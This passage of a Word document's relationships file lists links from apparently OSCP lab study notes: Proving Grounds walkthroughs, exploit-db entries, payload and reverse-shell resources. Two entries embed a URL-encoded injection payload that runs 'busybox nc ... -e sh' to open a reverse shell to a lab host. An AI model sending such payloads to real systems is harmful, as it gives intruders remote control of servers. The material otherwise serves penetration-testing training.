Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/45387" TargetMode="External"/><Relationship Id="rId1142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-72-proving-grounds-sybaris-b362f337365c" TargetMode="External"/><Relationship Id="rId1384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1eQuumOf-4w7p0vGKRx-f9MmRgVOLEM2Ra5TsvgJv4h0/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/besimorhino/powercat" TargetMode="External"/><Relationship Id="rId554" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId796" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crontab.guru/" TargetMode="External"/><Relationship Id="rId1143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://edbertsumicad.medium.com/pg-workaholic-privilege-escalation-via-misconfigured-plugin-loader-assume-breach-355a869b2efd" TargetMode="External"/><Relationship Id="rId1385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/48818" TargetMode="External"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/users/4003407/user4003407" TargetMode="External"/><Relationship Id="rId553" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image499.png"/><Relationship Id="rId795" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image188.png"/><Relationship Id="rId1144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId1386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/12DXL3Nczy0m3E8wH0nIzTWTMNUeCWNXsjHCMxse9w3Q/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/users/4003407/user4003407" TargetMode="External"/><Relationship Id="rId552" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image386.png"/><Relationship Id="rId794" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId1145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/X0RW3LL/XenSpawn?tab=readme-ov-file" TargetMode="External"/><Relationship Id="rId1387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/" TargetMode="External"/><Relationship Id="rId551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-slort-2294f5ddde5b" TargetMode="External"/><Relationship Id="rId793" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image289.png"/><Relationship Id="rId1146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/X0RW3LL/XenSpawn.git" TargetMode="External"/><Relationship Id="rId1388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image250.png"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.revshells.com/" TargetMode="External"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image172.png"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image146.png"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.com/exploit-database/exploitdb" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image251.png"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image316.png"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image174.png"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image486.png"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image256.png"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://infosecwriteups.com/proving-grounds-practice-dvr4-walkthrough-b97374d3733f" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image491.png"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://curl.se/" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://curl.se/" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/10ugNp-zMcFSfdEFCT0rB4VSvBa-1wYGH5r9UAtuQADA/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image210.png"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/sorcerer" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-roquefort-e61052190965" TargetMode="External"/><Relationship Id="rId495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image290.png"/><Relationship Id="rId494" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sqlmap.org/" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@z6157881/evilbox-one-vulnhub-walkthrough-e60d723c7639" TargetMode="External"/><Relationship Id="rId493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sqlmap.org/" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://launchpad.net/ubuntu/+source/openssh" TargetMode="External"/><Relationship Id="rId492" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://banua.medium.com/proving-grounds-butch-oscp-prep-2025-practice-14-74a0857cf4bd" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image444.png"/><Relationship Id="rId499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/mssql-for-pentester-command-execution-with-xp_cmdshell/" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image538.png"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image451.png"/><Relationship Id="rId497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image508.png"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/12DXL3Nczy0m3E8wH0nIzTWTMNUeCWNXsjHCMxse9w3Q/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId496" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image294.png"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image480.png"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@gayemans1003/offsec-proving-grounds-zab-walkthrough-4092a2c8c904" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection" TargetMode="External"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image273.png"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Ssh-keygen" TargetMode="External"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Ssh-keygen" TargetMode="External"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-noname-e9504220ae31" TargetMode="External"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberarri.com/2024/06/23/shakabrah-pg-play-writeup/" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/applicationpools" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/applicationpools" TargetMode="External"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/iis/manage/configuring-security/application-pool-identities" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image225.png"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Google_Drive" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Google_Drive" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image318.png"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/iis/manage/configuring-security/application-pool-identities" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image434.png"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image272.png"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId907" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/8/mount" TargetMode="External"/><Relationship Id="rId906" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/8/mount" TargetMode="External"/><Relationship Id="rId905" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image544.png"/><Relationship Id="rId904" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://man7.org/linux/man-pages/man1/find.1.html" TargetMode="External"/><Relationship Id="rId909" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://geek-university.com/linux/etc-fstab-file" TargetMode="External"/><Relationship Id="rId908" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://geek-university.com/linux/etc-fstab-file" TargetMode="External"/><Relationship Id="rId903" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://man7.org/linux/man-pages/man1/find.1.html" TargetMode="External"/><Relationship Id="rId902" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image509.png"/><Relationship Id="rId901" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/8/rpm" TargetMode="External"/><Relationship Id="rId900" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/8/rpm" TargetMode="External"/><Relationship Id="rId929" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Session_(computer_science)" TargetMode="External"/><Relationship Id="rId928" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Session_(computer_science)" TargetMode="External"/><Relationship Id="rId927" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image327.png"/><Relationship Id="rId926" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://webhook.site" TargetMode="External"/><Relationship Id="rId921" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.png"/><Relationship Id="rId920" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man7/daemon.7.html" TargetMode="External"/><Relationship Id="rId925" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting" TargetMode="External"/><Relationship Id="rId924" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image495.png"/><Relationship Id="rId923" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man7/raw.7.html" TargetMode="External"/><Relationship Id="rId922" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man7/raw.7.html" TargetMode="External"/><Relationship Id="rId918" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image376.png"/><Relationship Id="rId917" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId916" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image431.png"/><Relationship Id="rId915" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png"/><Relationship Id="rId919" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man7/daemon.7.html" TargetMode="External"/><Relationship Id="rId910" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image503.png"/><Relationship Id="rId914" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image396.png"/><Relationship Id="rId913" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image337.png"/><Relationship Id="rId912" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/8/lsblk" TargetMode="External"/><Relationship Id="rId911" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/8/lsblk" TargetMode="External"/><Relationship Id="rId1213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/48779" TargetMode="External"/><Relationship Id="rId1214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/48779" TargetMode="External"/><Relationship Id="rId1215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image552.png"/><Relationship Id="rId1216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image397.png"/><Relationship Id="rId1217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@haadimdwork/glasgow-smile-1-proving-groundswalkthrough-521b2fee1317" TargetMode="External"/><Relationship Id="rId1218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-internal-e5098dd29793" TargetMode="External"/><Relationship Id="rId1219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-24-proving-grounds-internal-5e0b8d368c62" TargetMode="External"/><Relationship Id="rId629" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://angelica.gitbook.io/hacktricks/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation" TargetMode="External"/><Relationship Id="rId624" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.nvidia.com/cuda-toolkit" TargetMode="External"/><Relationship Id="rId866" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Ridter/redis-rce" TargetMode="External"/><Relationship Id="rId623" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/OpenCL" TargetMode="External"/><Relationship Id="rId865" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/readys-proving-grounds-practice-walkthrough-88a3e0e21f62" TargetMode="External"/><Relationship Id="rId622" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/OpenCL" TargetMode="External"/><Relationship Id="rId864" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/n0b0dyCN/RedisModules-ExecuteCommand" TargetMode="External"/><Relationship Id="rId621" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image388.png"/><Relationship Id="rId863" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Ridter/redis-rce" TargetMode="External"/><Relationship Id="rId628" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=yTHtLi9YZ2s&amp;t=2865s" TargetMode="External"/><Relationship Id="rId627" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId869" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/n0b0dyCN/redis-rogue-server" TargetMode="External"/><Relationship Id="rId626" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId868" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@C4berowl/readys-write-up-proving-grounds-e066074eed" TargetMode="External"/><Relationship Id="rId625" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.nvidia.com/cuda-toolkit" TargetMode="External"/><Relationship Id="rId867" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Ridter/redis-rce" TargetMode="External"/><Relationship Id="rId620" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashes.com/en/tools/hash_identifier" TargetMode="External"/><Relationship Id="rId862" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-9-proving-grounds-wombo-facdbcf2ef18" TargetMode="External"/><Relationship Id="rId861" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/n0b0dyCN/redis-rogue-server/blob/master/exp.so" TargetMode="External"/><Relationship Id="rId1210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cmscanbesimple.org/blog/cms-made-simple-admin-password-recovery" TargetMode="External"/><Relationship Id="rId860" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Ridter/redis-rce" TargetMode="External"/><Relationship Id="rId1211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cmscanbesimple.org/blog/cms-made-simple-admin-password-recovery" TargetMode="External"/><Relationship Id="rId1212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image368.png"/><Relationship Id="rId1202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://morsecode.world/international/decoder/audio-decoder-adaptive.html" TargetMode="External"/><Relationship Id="rId1203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://morsecode.world/international/decoder/audio-decoder-adaptive.html" TargetMode="External"/><Relationship Id="rId1204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/election-by-tripath/" TargetMode="External"/><Relationship Id="rId1205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@zeroDaykt/election1-proving-grounds-play-walkthrough-2c35b07844ec" TargetMode="External"/><Relationship Id="rId1206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@zeroDaykt/election1-proving-grounds-play-walkthrough-2c35b07844ec" TargetMode="External"/><Relationship Id="rId1207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/47173?source=post_page-----2c35b07844ec---------------------------------------" TargetMode="External"/><Relationship Id="rId1208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/47173" TargetMode="External"/><Relationship Id="rId1209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-my-cmsms-walkthrough-intermediate-4648b51361f0" TargetMode="External"/><Relationship Id="rId619" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image484.png"/><Relationship Id="rId618" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashcat.net/wiki/doku.php?id=example_hashes" TargetMode="External"/><Relationship Id="rId613" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackmd.io/@rudefish/offsec-pg-funboxrookie-easy" TargetMode="External"/><Relationship Id="rId855" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@z6157881/cybersploit-1-vulnhub-walkthrough-8537c7b71dcf" TargetMode="External"/><Relationship Id="rId612" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image354.png"/><Relationship Id="rId854" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-my-cmsms-walkthrough-intermediate-4648b51361f0" TargetMode="External"/><Relationship Id="rId611" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ypopova3/sunsetdecoy-offsec-3734783dbfda" TargetMode="External"/><Relationship Id="rId853" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@adamforsythebartlett/scrutiny-walkthrough-proving-grounds-practice-01737dd96583" TargetMode="External"/><Relationship Id="rId610" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image398.png"/><Relationship Id="rId852" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@whitebearr82/pgpractice-linux-postfish-192-168-56-137-9a48d8577c5f" TargetMode="External"/><Relationship Id="rId617" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-nickel-f76b06f60db1" TargetMode="External"/><Relationship Id="rId859" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/wombo-proving-ground-practice-walkthrough-c60f1ce7223f" TargetMode="External"/><Relationship Id="rId616" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.png"/><Relationship Id="rId858" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/readys-proving-grounds-practice-walkthrough-88a3e0e21f62" TargetMode="External"/><Relationship Id="rId615" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image437.png"/><Relationship Id="rId857" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image379.png"/><Relationship Id="rId614" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image406.png"/><Relationship Id="rId856" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image242.png"/><Relationship Id="rId851" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/postfish" TargetMode="External"/><Relationship Id="rId850" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@huwanyu94/proving-grounds-practice-hepet-walkthrough-ee7e051af47b" TargetMode="External"/><Relationship Id="rId1200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@hamzamalick72/sunsetnoontide-walkthrough-offsec-proving-ground-vulnhub-c378a31f6a5c" TargetMode="External"/><Relationship Id="rId1201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@d3mi/vegeta1-offsec-proving-grounds-acd77f1b5b61" TargetMode="External"/><Relationship Id="rId1235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image253.png"/><Relationship Id="rId1236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/b4ny4n/CVE-2020-13151" TargetMode="External"/><Relationship Id="rId1237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.117.150:8080/search?query=helloworld" TargetMode="External"/><Relationship Id="rId1238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.117.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27busybox%20nc%20192.168.45.232%204444%20-e%20sh%27%29%7D" TargetMode="External"/><Relationship Id="rId1239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.117.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27busybox%20nc%20192.168.45.232%204444%20-e%20sh%27%29%7D" TargetMode="External"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image419.png"/><Relationship Id="rId404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image263.png"/><Relationship Id="rId646" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId888" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cron" TargetMode="External"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image356.png"/><Relationship Id="rId645" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image247.png"/><Relationship Id="rId887" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image252.png"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image167.png"/><Relationship Id="rId644" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image447.png"/><Relationship Id="rId886" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image382.png"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image277.png"/><Relationship Id="rId643" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image510.png"/><Relationship Id="rId885" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image363.png"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/btrsys2.1" TargetMode="External"/><Relationship Id="rId407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 